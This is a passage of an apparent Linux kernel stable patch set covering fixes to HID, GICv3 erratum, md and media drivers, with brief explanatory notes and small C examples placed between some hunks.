+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index e906ee375298a..b2cd7527de195 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -838,8 +838,7 @@ static int hidpp_unifying_init(struct hidpp_device *hidpp)
+ 	if (ret)
+ 		return ret;
+ 
+-	snprintf(hdev->uniq, sizeof(hdev->uniq), "%04x-%4phD",
+-		 hdev->product, &serial);
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%4phD", &serial);
+ 	dbg_hid("HID++ Unifying: Got serial: %s\n", hdev->uniq);
+ 
+ 	name = hidpp_unifying_get_name(hidpp);
+@@ -932,6 +931,54 @@ print_version:
+ 	return 0;
+ }
+ 
++/* -------------------------------------------------------------------------- */
++/* 0x0003: Device Information                                                 */
++/* -------------------------------------------------------------------------- */
++
++#define HIDPP_PAGE_DEVICE_INFORMATION			0x0003
++
++#define CMD_GET_DEVICE_INFO				0x00
++
++static int hidpp_get_serial(struct hidpp_device *hidpp, u32 *serial)
++{
++	struct hidpp_report response;
++	u8 feature_type;
++	u8 feature_index;
++	int ret;
++
++	ret = hidpp_root_get_feature(hidpp, HIDPP_PAGE_DEVICE_INFORMATION,
++				     &feature_index,
++				     &feature_type);
++	if (ret)
++		return ret;
++
++	ret = hidpp_send_fap_command_sync(hidpp, feature_index,
++					  CMD_GET_DEVICE_INFO,
++					  NULL, 0, &response);
++	if (ret)
++		return ret;
++
++	/* See hidpp_unifying_get_serial() */
++	*serial = *((u32 *)&response.rap.params[1]);
++	return 0;
++}
++
++static int hidpp_serial_init(struct hidpp_device *hidpp)
++{
++	struct hid_device *hdev = hidpp->hid_dev;
++	u32 serial;
++	int ret;
++
++	ret = hidpp_get_serial(hidpp, &serial);
++	if (ret)
++		return ret;
++
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%4phD", &serial);
++	dbg_hid("HID++ DeviceInformation: Got serial: %s\n", hdev->uniq);
++
++	return 0;
++}
++
+ /* -------------------------------------------------------------------------- */
+ /* 0x0005: GetDeviceNameType                                                  */
+ /* -------------------------------------------------------------------------- */
+@@ -4194,6 +4241,8 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_UNIFYING)
+ 		hidpp_unifying_init(hidpp);
++	else if (hid_is_usb(hidpp->hid_dev))
++		hidpp_serial_init(hidpp);
+ 
+ 	connected = hidpp_root_get_protocol_version(hidpp) == 0;
+ 	atomic_set(&hidpp->connected, connected);
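
Both serial paths above format the 32-bit serial with the kernel's "%4phD" printk extension, which prints the four bytes as dash-separated hex in memory order. A rough userspace equivalent, for illustration only:

#include <stdio.h>
#include <stdint.h>

/* Approximates "%4phD": four bytes, two hex digits each, joined by
 * dashes, in the order the bytes sit in memory. */
static void format_serial(char *buf, size_t len, uint32_t serial)
{
	const uint8_t *p = (const uint8_t *)&serial;

	snprintf(buf, len, "%02x-%02x-%02x-%02x", p[0], p[1], p[2], p[3]);
}

int main(void)
{
	char uniq[32];

	format_serial(uniq, sizeof(uniq), 0x78563412);
	printf("uniq: %s\n", uniq); /* "12-34-56-78" on little-endian */
	return 0;
}

Dropping the product ID from hdev->uniq (the first hunk) keeps the string format identical whether the serial came from the Unifying path or the new Device Information feature.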
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 0c6a82c665c1d..d2f500242ed40 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -1963,18 +1963,7 @@ static void wacom_map_usage(struct input_dev *input, struct hid_usage *usage,
+ static void wacom_wac_battery_usage_mapping(struct hid_device *hdev,
+ 		struct hid_field *field, struct hid_usage *usage)
+ {
+-	struct wacom *wacom = hid_get_drvdata(hdev);
+-	struct wacom_wac *wacom_wac = &wacom->wacom_wac;
+-	struct wacom_features *features = &wacom_wac->features;
+-	unsigned equivalent_usage = wacom_equivalent_usage(usage->hid);
+-
+-	switch (equivalent_usage) {
+-	case HID_DG_BATTERYSTRENGTH:
+-	case WACOM_HID_WD_BATTERY_LEVEL:
+-	case WACOM_HID_WD_BATTERY_CHARGING:
+-		features->quirks |= WACOM_QUIRK_BATTERY;
+-		break;
+-	}
++	return;
+ }
+ 
+ static void wacom_wac_battery_event(struct hid_device *hdev, struct hid_field *field,
+@@ -1995,18 +1984,21 @@ static void wacom_wac_battery_event(struct hid_device *hdev, struct hid_field *f
+ 			wacom_wac->hid_data.bat_connected = 1;
+ 			wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
+ 		}
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	case WACOM_HID_WD_BATTERY_LEVEL:
+ 		value = value * 100 / (field->logical_maximum - field->logical_minimum);
+ 		wacom_wac->hid_data.battery_capacity = value;
+ 		wacom_wac->hid_data.bat_connected = 1;
+ 		wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	case WACOM_HID_WD_BATTERY_CHARGING:
+ 		wacom_wac->hid_data.bat_charging = value;
+ 		wacom_wac->hid_data.ps_connected = value;
+ 		wacom_wac->hid_data.bat_connected = 1;
+ 		wacom_wac->hid_data.bat_status = WACOM_POWER_SUPPLY_STATUS_AUTO;
++		wacom_wac->features.quirks |= WACOM_QUIRK_BATTERY;
+ 		break;
+ 	}
+ }
+@@ -2022,18 +2014,15 @@ static void wacom_wac_battery_report(struct hid_device *hdev,
+ {
+ 	struct wacom *wacom = hid_get_drvdata(hdev);
+ 	struct wacom_wac *wacom_wac = &wacom->wacom_wac;
+-	struct wacom_features *features = &wacom_wac->features;
+ 
+-	if (features->quirks & WACOM_QUIRK_BATTERY) {
+-		int status = wacom_wac->hid_data.bat_status;
+-		int capacity = wacom_wac->hid_data.battery_capacity;
+-		bool charging = wacom_wac->hid_data.bat_charging;
+-		bool connected = wacom_wac->hid_data.bat_connected;
+-		bool powered = wacom_wac->hid_data.ps_connected;
++	int status = wacom_wac->hid_data.bat_status;
++	int capacity = wacom_wac->hid_data.battery_capacity;
++	bool charging = wacom_wac->hid_data.bat_charging;
++	bool connected = wacom_wac->hid_data.bat_connected;
++	bool powered = wacom_wac->hid_data.ps_connected;
+ 
+-		wacom_notify_battery(wacom_wac, status, capacity, charging,
+-				     connected, powered);
+-	}
++	wacom_notify_battery(wacom_wac, status, capacity, charging,
++			     connected, powered);
+ }
+ 
+ static void wacom_wac_pad_usage_mapping(struct hid_device *hdev,
+diff --git a/drivers/irqchip/Kconfig b/drivers/irqchip/Kconfig
+index 7ef9f5e696d31..a29a426e4eed7 100644
+--- a/drivers/irqchip/Kconfig
++++ b/drivers/irqchip/Kconfig
+@@ -35,6 +35,7 @@ config ARM_GIC_V3
+ 	select IRQ_DOMAIN_HIERARCHY
+ 	select PARTITION_PERCPU
+ 	select GENERIC_IRQ_EFFECTIVE_AFF_MASK if SMP
++	select HAVE_ARM_SMCCC_DISCOVERY
+ 
+ config ARM_GIC_V3_ITS
+ 	bool
+diff --git a/drivers/irqchip/irq-gic-v3.c b/drivers/irqchip/irq-gic-v3.c
+index 34d58567b78d1..2182f87d2d12e 100644
+--- a/drivers/irqchip/irq-gic-v3.c
++++ b/drivers/irqchip/irq-gic-v3.c
+@@ -23,6 +23,9 @@
+ #include <linux/irqchip/arm-gic-common.h>
+ #include <linux/irqchip/arm-gic-v3.h>
+ #include <linux/irqchip/irq-partition-percpu.h>
++#include <linux/bitfield.h>
++#include <linux/bits.h>
++#include <linux/arm-smccc.h>
+ 
+ #include <asm/cputype.h>
+ #include <asm/exception.h>
+@@ -46,6 +49,7 @@ struct redist_region {
+ 
+ struct gic_chip_data {
+ 	struct fwnode_handle	*fwnode;
++	phys_addr_t		dist_phys_base;
+ 	void __iomem		*dist_base;
+ 	struct redist_region	*redist_regions;
+ 	struct rdists		rdists;
+@@ -58,6 +62,10 @@ struct gic_chip_data {
+ 	struct partition_desc	**ppi_descs;
+ };
+ 
++#define T241_CHIPS_MAX		4
++static void __iomem *t241_dist_base_alias[T241_CHIPS_MAX] __read_mostly;
++static DEFINE_STATIC_KEY_FALSE(gic_nvidia_t241_erratum);
++
+ static struct gic_chip_data gic_data __read_mostly;
+ static DEFINE_STATIC_KEY_TRUE(supports_deactivate_key);
+ 
+@@ -187,6 +195,39 @@ static inline bool gic_irq_in_rdist(struct irq_data *d)
+ 	}
+ }
+ 
++static inline void __iomem *gic_dist_base_alias(struct irq_data *d)
++{
++	if (static_branch_unlikely(&gic_nvidia_t241_erratum)) {
++		irq_hw_number_t hwirq = irqd_to_hwirq(d);
++		u32 chip;
++
++		/*
++		 * For the erratum T241-FABRIC-4, read accesses to GICD_In{E}
++		 * registers are directed to the chip that owns the SPI. The
++		 * alias region can also be used for writes to the
++		 * GICD_In{E} except GICD_ICENABLERn. Each chip has support
++		 * for 320 {E}SPIs. Mappings for all 4 chips:
++		 *    Chip0 = 32-351
++		 *    Chip1 = 352-671
++		 *    Chip2 = 672-991
++		 *    Chip3 = 4096-4415
++		 */
++		switch (__get_intid_range(hwirq)) {
++		case SPI_RANGE:
++			chip = (hwirq - 32) / 320;
++			break;
++		case ESPI_RANGE:
++			chip = 3;
++			break;
++		default:
++			unreachable();
++		}
++		return t241_dist_base_alias[chip];
++	}
++
++	return gic_data.dist_base;
++}
++
+ static inline void __iomem *gic_dist_base(struct irq_data *d)
+ {
+ 	switch (get_intid_range(d)) {
+@@ -345,7 +386,7 @@ static int gic_peek_irq(struct irq_data *d, u32 offset)
+ 	if (gic_irq_in_rdist(d))
+ 		base = gic_data_rdist_sgi_base();
+ 	else
+-		base = gic_data.dist_base;
++		base = gic_dist_base_alias(d);
+ 
+ 	return !!(readl_relaxed(base + offset + (index / 32) * 4) & mask);
+ }
+@@ -596,7 +637,7 @@ static int gic_set_type(struct irq_data *d, unsigned int type)
+ 	if (gic_irq_in_rdist(d))
+ 		base = gic_data_rdist_sgi_base();
+ 	else
+-		base = gic_data.dist_base;
++		base = gic_dist_base_alias(d);
+ 
+ 	offset = convert_offset_index(d, GICD_ICFGR, &index);
+ 
+@@ -1718,6 +1759,43 @@ static bool gic_enable_quirk_hip06_07(void *data)
+ 	return false;
+ }
+ 
++#define T241_CHIPN_MASK		GENMASK_ULL(45, 44)
++#define T241_CHIP_GICDA_OFFSET	0x1580000
++#define SMCCC_SOC_ID_T241	0x036b0241
++
++static bool gic_enable_quirk_nvidia_t241(void *data)
++{
++	s32 soc_id = arm_smccc_get_soc_id_version();
++	unsigned long chip_bmask = 0;
++	phys_addr_t phys;
++	u32 i;
++
++	/* Check JEP106 code for NVIDIA T241 chip (036b:0241) */
++	if ((soc_id < 0) || (soc_id != SMCCC_SOC_ID_T241))
++		return false;
++
++	/* Find the chips based on GICR regions PHYS addr */
++	for (i = 0; i < gic_data.nr_redist_regions; i++) {
++		chip_bmask |= BIT(FIELD_GET(T241_CHIPN_MASK,
++				  (u64)gic_data.redist_regions[i].phys_base));
++	}
++
++	if (hweight32(chip_bmask) < 3)
++		return false;
++
++	/* Setup GICD alias regions */
++	for (i = 0; i < ARRAY_SIZE(t241_dist_base_alias); i++) {
++		if (chip_bmask & BIT(i)) {
++			phys = gic_data.dist_phys_base + T241_CHIP_GICDA_OFFSET;
++			phys |= FIELD_PREP(T241_CHIPN_MASK, i);
++			t241_dist_base_alias[i] = ioremap(phys, SZ_64K);
++			WARN_ON_ONCE(!t241_dist_base_alias[i]);
++		}
++	}
++	static_branch_enable(&gic_nvidia_t241_erratum);
++	return true;
++}
++
+ static const struct gic_quirk gic_quirks[] = {
+ 	{
+ 		.desc	= "GICv3: Qualcomm MSM8996 broken firmware",
+@@ -1749,6 +1827,12 @@ static const struct gic_quirk gic_quirks[] = {
+ 		.mask	= 0xe8f00fff,
+ 		.init	= gic_enable_quirk_cavium_38539,
+ 	},
++	{
++		.desc	= "GICv3: NVIDIA erratum T241-FABRIC-4",
++		.iidr	= 0x0402043b,
++		.mask	= 0xffffffff,
++		.init	= gic_enable_quirk_nvidia_t241,
++	},
+ 	{
+ 	}
+ };
+@@ -1816,7 +1900,8 @@ static void gic_enable_nmi_support(void)
+ 		gic_chip.flags |= IRQCHIP_SUPPORTS_NMI;
+ }
+ 
+-static int __init gic_init_bases(void __iomem *dist_base,
++static int __init gic_init_bases(phys_addr_t dist_phys_base,
++				 void __iomem *dist_base,
+ 				 struct redist_region *rdist_regs,
+ 				 u32 nr_redist_regions,
+ 				 u64 redist_stride,
+@@ -1832,6 +1917,7 @@ static int __init gic_init_bases(void __iomem *dist_base,
+ 		pr_info("GIC: Using split EOI/Deactivate mode\n");
+ 
+ 	gic_data.fwnode = handle;
++	gic_data.dist_phys_base = dist_phys_base;
+ 	gic_data.dist_base = dist_base;
+ 	gic_data.redist_regions = rdist_regs;
+ 	gic_data.nr_redist_regions = nr_redist_regions;
+@@ -1859,10 +1945,13 @@ static int __init gic_init_bases(void __iomem *dist_base,
+ 	gic_data.domain = irq_domain_create_tree(handle, &gic_irq_domain_ops,
+ 						 &gic_data);
+ 	gic_data.rdists.rdist = alloc_percpu(typeof(*gic_data.rdists.rdist));
+-	gic_data.rdists.has_rvpeid = true;
+-	gic_data.rdists.has_vlpis = true;
+-	gic_data.rdists.has_direct_lpi = true;
+-	gic_data.rdists.has_vpend_valid_dirty = true;
++	if (!static_branch_unlikely(&gic_nvidia_t241_erratum)) {
++		/* Disable GICv4.x features for the erratum T241-FABRIC-4 */
++		gic_data.rdists.has_rvpeid = true;
++		gic_data.rdists.has_vlpis = true;
++		gic_data.rdists.has_direct_lpi = true;
++		gic_data.rdists.has_vpend_valid_dirty = true;
++	}
+ 
+ 	if (WARN_ON(!gic_data.domain) || WARN_ON(!gic_data.rdists.rdist)) {
+ 		err = -ENOMEM;
+@@ -2068,6 +2157,7 @@ static void __iomem *gic_of_iomap(struct device_node *node, int idx,
+ 
+ static int __init gic_of_init(struct device_node *node, struct device_node *parent)
+ {
++	phys_addr_t dist_phys_base;
+ 	void __iomem *dist_base;
+ 	struct redist_region *rdist_regs;
+ 	struct resource res;
+@@ -2081,6 +2171,8 @@ static int __init gic_of_init(struct device_node *node, struct device_node *pare
+ 		return PTR_ERR(dist_base);
+ 	}
+ 
++	dist_phys_base = res.start;
++
+ 	err = gic_validate_dist_version(dist_base);
+ 	if (err) {
+ 		pr_err("%pOF: no distributor detected, giving up\n", node);
+@@ -2112,8 +2204,8 @@ static int __init gic_of_init(struct device_node *node, struct device_node *pare
+ 
+ 	gic_enable_of_quirks(node, gic_quirks, &gic_data);
+ 
+-	err = gic_init_bases(dist_base, rdist_regs, nr_redist_regions,
+-			     redist_stride, &node->fwnode);
++	err = gic_init_bases(dist_phys_base, dist_base, rdist_regs,
++			     nr_redist_regions, redist_stride, &node->fwnode);
+ 	if (err)
+ 		goto out_unmap_rdist;
+ 
+@@ -2429,8 +2521,9 @@ gic_acpi_init(union acpi_subtable_headers *header, const unsigned long end)
+ 		goto out_redist_unmap;
+ 	}
+ 
+-	err = gic_init_bases(acpi_data.dist_base, acpi_data.redist_regs,
+-			     acpi_data.nr_redist_regions, 0, gsi_domain_handle);
++	err = gic_init_bases(dist->base_address, acpi_data.dist_base,
++			     acpi_data.redist_regs, acpi_data.nr_redist_regions,
++			     0, gsi_domain_handle);
+ 	if (err)
+ 		goto out_fwhandle_free;
+ 
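
Working through the mapping in gic_dist_base_alias() above: each of the four chips owns 320 SPIs starting at INTID 32, and every ESPI belongs to chip 3, so the chip index is plain integer division. A standalone check of the arithmetic:

#include <stdio.h>

/* Mirrors the SPI/ESPI-to-chip mapping from gic_dist_base_alias():
 * chip0 = 32-351, chip1 = 352-671, chip2 = 672-991, chip3 = ESPIs. */
static unsigned int t241_chip_for_hwirq(unsigned long hwirq)
{
	if (hwirq >= 4096)              /* ESPI range */
		return 3;
	return (hwirq - 32) / 320;      /* SPI range */
}

int main(void)
{
	printf("hwirq 40   -> chip %u\n", t241_chip_for_hwirq(40));   /* 0 */
	printf("hwirq 400  -> chip %u\n", t241_chip_for_hwirq(400));  /* 1 */
	printf("hwirq 4100 -> chip %u\n", t241_chip_for_hwirq(4100)); /* 3 */
	return 0;
}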
+diff --git a/drivers/mcb/mcb-pci.c b/drivers/mcb/mcb-pci.c
+index dc88232d9af83..53d9202ff9a7c 100644
+--- a/drivers/mcb/mcb-pci.c
++++ b/drivers/mcb/mcb-pci.c
+@@ -31,7 +31,7 @@ static int mcb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct resource *res;
+ 	struct priv *priv;
+-	int ret;
++	int ret, table_size;
+ 	unsigned long flags;
+ 
+ 	priv = devm_kzalloc(&pdev->dev, sizeof(struct priv), GFP_KERNEL);
+@@ -90,7 +90,30 @@ static int mcb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	if (ret < 0)
+ 		goto out_mcb_bus;
+ 
+-	dev_dbg(&pdev->dev, "Found %d cells\n", ret);
++	table_size = ret;
++
++	if (table_size < CHAM_HEADER_SIZE) {
++		/* Release the previous resources */
++		devm_iounmap(&pdev->dev, priv->base);
++		devm_release_mem_region(&pdev->dev, priv->mapbase, CHAM_HEADER_SIZE);
++
++		/* Then, allocate it again with the actual chameleon table size */
++		res = devm_request_mem_region(&pdev->dev, priv->mapbase,
++						table_size,
++						KBUILD_MODNAME);
++		if (!res) {
++			dev_err(&pdev->dev, "Failed to request PCI memory\n");
++			ret = -EBUSY;
++			goto out_mcb_bus;
++		}
++
++		priv->base = devm_ioremap(&pdev->dev, priv->mapbase, table_size);
++		if (!priv->base) {
++			dev_err(&pdev->dev, "Cannot ioremap\n");
++			ret = -ENOMEM;
++			goto out_mcb_bus;
++		}
++	}
+ 
+ 	mcb_bus_add_devices(priv->bus);
+ 
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index d5c362b1602b6..bb73a541bb193 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8028,16 +8028,16 @@ static int status_resync(struct seq_file *seq, struct mddev *mddev)
+ 	} else if (resync > max_sectors) {
+ 		resync = max_sectors;
+ 	} else {
+-		resync -= atomic_read(&mddev->recovery_active);
+-		if (resync < MD_RESYNC_ACTIVE) {
+-			/*
+-			 * Resync has started, but the subtraction has
+-			 * yielded one of the special values. Force it
+-			 * to active to ensure the status reports an
+-			 * active resync.
+-			 */
++		res = atomic_read(&mddev->recovery_active);
++		/*
++		 * Resync has started, but the subtraction has overflowed or
++		 * yielded one of the special values. Force it to active to
++		 * ensure the status reports an active resync.
++		 */
++		if (resync < res || resync - res < MD_RESYNC_ACTIVE)
+ 			resync = MD_RESYNC_ACTIVE;
+-		}
++		else
++			resync -= res;
+ 	}
+ 
+ 	if (resync == MD_RESYNC_NONE) {
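
The md change above guards the subtraction because the resync counters are unsigned; if recovery_active momentarily exceeds the resync position, resync - res wraps to a huge value instead of going negative. The ordering of the two checks is what matters, as this small demonstration shows (MD_RESYNC_ACTIVE's value here is illustrative):

#include <stdio.h>

typedef unsigned long long sector_t;    /* stand-in for the kernel type */

#define MD_RESYNC_ACTIVE 3ULL           /* illustrative small sentinel */

/* Test for wrap-around *before* subtracting: for unsigned types,
 * "resync - res < MD_RESYNC_ACTIVE" alone cannot catch res > resync. */
static sector_t safe_resync(sector_t resync, sector_t res)
{
	if (resync < res || resync - res < MD_RESYNC_ACTIVE)
		return MD_RESYNC_ACTIVE;
	return resync - res;
}

int main(void)
{
	printf("%llu\n", safe_resync(10, 20));   /* 3, not ~2^64 */
	printf("%llu\n", safe_resync(100, 20));  /* 80 */
	return 0;
}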
+diff --git a/drivers/media/pci/cx23885/cx23885-core.c b/drivers/media/pci/cx23885/cx23885-core.c
+index 9232a966bcabb..2ce2914576cf2 100644
+--- a/drivers/media/pci/cx23885/cx23885-core.c
++++ b/drivers/media/pci/cx23885/cx23885-core.c
+@@ -1325,7 +1325,9 @@ void cx23885_free_buffer(struct cx23885_dev *dev, struct cx23885_buffer *buf)
+ {
+ 	struct cx23885_riscmem *risc = &buf->risc;
+ 
+-	dma_free_coherent(&dev->pci->dev, risc->size, risc->cpu, risc->dma);
++	if (risc->cpu)
++		dma_free_coherent(&dev->pci->dev, risc->size, risc->cpu, risc->dma);
++	memset(risc, 0, sizeof(*risc));
+ }
+ 
+ static void cx23885_tsport_reg_dump(struct cx23885_tsport *port)
+diff --git a/drivers/media/pci/cx23885/cx23885-video.c b/drivers/media/pci/cx23885/cx23885-video.c
+index 3d03f5e95786a..671fc0588e431 100644
+--- a/drivers/media/pci/cx23885/cx23885-video.c
++++ b/drivers/media/pci/cx23885/cx23885-video.c
+@@ -342,6 +342,7 @@ static int queue_setup(struct vb2_queue *q,
+ 
+ static int buffer_prepare(struct vb2_buffer *vb)
+ {
++	int ret;
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct cx23885_dev *dev = vb->vb2_queue->drv_priv;
+ 	struct cx23885_buffer *buf =
+@@ -358,12 +359,12 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 
+ 	switch (dev->field) {
+ 	case V4L2_FIELD_TOP:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, 0, UNSET,
+ 				buf->bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_BOTTOM:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, UNSET, 0,
+ 				buf->bpl, 0, dev->height);
+ 		break;
+@@ -391,21 +392,21 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 			line0_offset = 0;
+ 			line1_offset = buf->bpl;
+ 		}
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl, line0_offset,
+ 				line1_offset,
+ 				buf->bpl, buf->bpl,
+ 				dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_TB:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl,
+ 				0, buf->bpl * (dev->height >> 1),
+ 				buf->bpl, 0,
+ 				dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_BT:
+-		cx23885_risc_buffer(dev->pci, &buf->risc,
++		ret = cx23885_risc_buffer(dev->pci, &buf->risc,
+ 				sgt->sgl,
+ 				buf->bpl * (dev->height >> 1), 0,
+ 				buf->bpl, 0,
+@@ -418,7 +419,7 @@ static int buffer_prepare(struct vb2_buffer *vb)
+ 		buf, buf->vb.vb2_buf.index,
+ 		dev->width, dev->height, dev->fmt->depth, dev->fmt->fourcc,
+ 		(unsigned long)buf->risc.dma);
+-	return 0;
++	return ret;
+ }
+ 
+ static void buffer_finish(struct vb2_buffer *vb)
+diff --git a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+index 8287851b5ffdc..aaa1d2dedebdd 100644
+--- a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
++++ b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+@@ -697,7 +697,7 @@ static void netup_unidvb_dma_fini(struct netup_unidvb_dev *ndev, int num)
+ 	netup_unidvb_dma_enable(dma, 0);
+ 	msleep(50);
+ 	cancel_work_sync(&dma->work);
+-	del_timer(&dma->timeout);
++	del_timer_sync(&dma->timeout);
+ }
+ 
+ static int netup_unidvb_dma_setup(struct netup_unidvb_dev *ndev)
+diff --git a/drivers/media/pci/tw68/tw68-video.c b/drivers/media/pci/tw68/tw68-video.c
+index 0cbc5b038073b..773a18702d369 100644
+--- a/drivers/media/pci/tw68/tw68-video.c
++++ b/drivers/media/pci/tw68/tw68-video.c
+@@ -437,6 +437,7 @@ static void tw68_buf_queue(struct vb2_buffer *vb)
+  */
+ static int tw68_buf_prepare(struct vb2_buffer *vb)
+ {
++	int ret;
+ 	struct vb2_v4l2_buffer *vbuf = to_vb2_v4l2_buffer(vb);
+ 	struct vb2_queue *vq = vb->vb2_queue;
+ 	struct tw68_dev *dev = vb2_get_drv_priv(vq);
+@@ -452,30 +453,30 @@ static int tw68_buf_prepare(struct vb2_buffer *vb)
+ 	bpl = (dev->width * dev->fmt->depth) >> 3;
+ 	switch (dev->field) {
+ 	case V4L2_FIELD_TOP:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, UNSET, bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_BOTTOM:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 UNSET, 0, bpl, 0, dev->height);
+ 		break;
+ 	case V4L2_FIELD_SEQ_TB:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, bpl * (dev->height >> 1),
+ 				 bpl, 0, dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_SEQ_BT:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 bpl * (dev->height >> 1), 0,
+ 				 bpl, 0, dev->height >> 1);
+ 		break;
+ 	case V4L2_FIELD_INTERLACED:
+ 	default:
+-		tw68_risc_buffer(dev->pci, buf, dma->sgl,
++		ret = tw68_risc_buffer(dev->pci, buf, dma->sgl,
+ 				 0, bpl, bpl, bpl, dev->height >> 1);
+ 		break;
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ static void tw68_buf_finish(struct vb2_buffer *vb)
+@@ -485,7 +486,8 @@ static void tw68_buf_finish(struct vb2_buffer *vb)
+ 	struct tw68_dev *dev = vb2_get_drv_priv(vq);
+ 	struct tw68_buf *buf = container_of(vbuf, struct tw68_buf, vb);
+ 
+-	dma_free_coherent(&dev->pci->dev, buf->size, buf->cpu, buf->dma);
++	if (buf->cpu)
++		dma_free_coherent(&dev->pci->dev, buf->size, buf->cpu, buf->dma);
+ }
+ 
+ static int tw68_start_streaming(struct vb2_queue *q, unsigned int count)
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+index c99705681a03e..93fcea821001f 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec.c
+@@ -735,6 +735,13 @@ int vb2ops_vdec_queue_setup(struct vb2_queue *vq, unsigned int *nbuffers,
+ 	}
+ 
+ 	if (*nplanes) {
++		if (vq->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
++			if (*nplanes != q_data->fmt->num_planes)
++				return -EINVAL;
++		} else {
++			if (*nplanes != 1)
++				return -EINVAL;
++		}
+ 		for (i = 0; i < *nplanes; i++) {
+ 			if (sizes[i] < q_data->sizeimage[i])
+ 				return -EINVAL;
+diff --git a/drivers/media/platform/renesas/vsp1/vsp1_drm.c b/drivers/media/platform/renesas/vsp1/vsp1_drm.c
+index c6f25200982c8..7fe375b6322cd 100644
+--- a/drivers/media/platform/renesas/vsp1/vsp1_drm.c
++++ b/drivers/media/platform/renesas/vsp1/vsp1_drm.c
+@@ -66,7 +66,9 @@ static int vsp1_du_insert_uif(struct vsp1_device *vsp1,
+ 			      struct vsp1_entity *prev, unsigned int prev_pad,
+ 			      struct vsp1_entity *next, unsigned int next_pad)
+ {
+-	struct v4l2_subdev_format format;
++	struct v4l2_subdev_format format = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	int ret;
+ 
+ 	if (!uif) {
+@@ -82,8 +84,6 @@ static int vsp1_du_insert_uif(struct vsp1_device *vsp1,
+ 	prev->sink = uif;
+ 	prev->sink_pad = UIF_PAD_SINK;
+ 
+-	memset(&format, 0, sizeof(format));
+-	format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	format.pad = prev_pad;
+ 
+ 	ret = v4l2_subdev_call(&prev->subdev, pad, get_fmt, NULL, &format);
+@@ -118,8 +118,12 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 				      struct vsp1_entity *uif,
+ 				      unsigned int brx_input)
+ {
+-	struct v4l2_subdev_selection sel;
+-	struct v4l2_subdev_format format;
++	struct v4l2_subdev_selection sel = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
++	struct v4l2_subdev_format format = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	const struct v4l2_rect *crop;
+ 	int ret;
+ 
+@@ -129,8 +133,6 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 	 */
+ 	crop = &vsp1->drm->inputs[rpf->entity.index].crop;
+ 
+-	memset(&format, 0, sizeof(format));
+-	format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 	format.pad = RWPF_PAD_SINK;
+ 	format.format.width = crop->width + crop->left;
+ 	format.format.height = crop->height + crop->top;
+@@ -147,8 +149,6 @@ static int vsp1_du_pipeline_setup_rpf(struct vsp1_device *vsp1,
+ 		__func__, format.format.width, format.format.height,
+ 		format.format.code, rpf->entity.index);
+ 
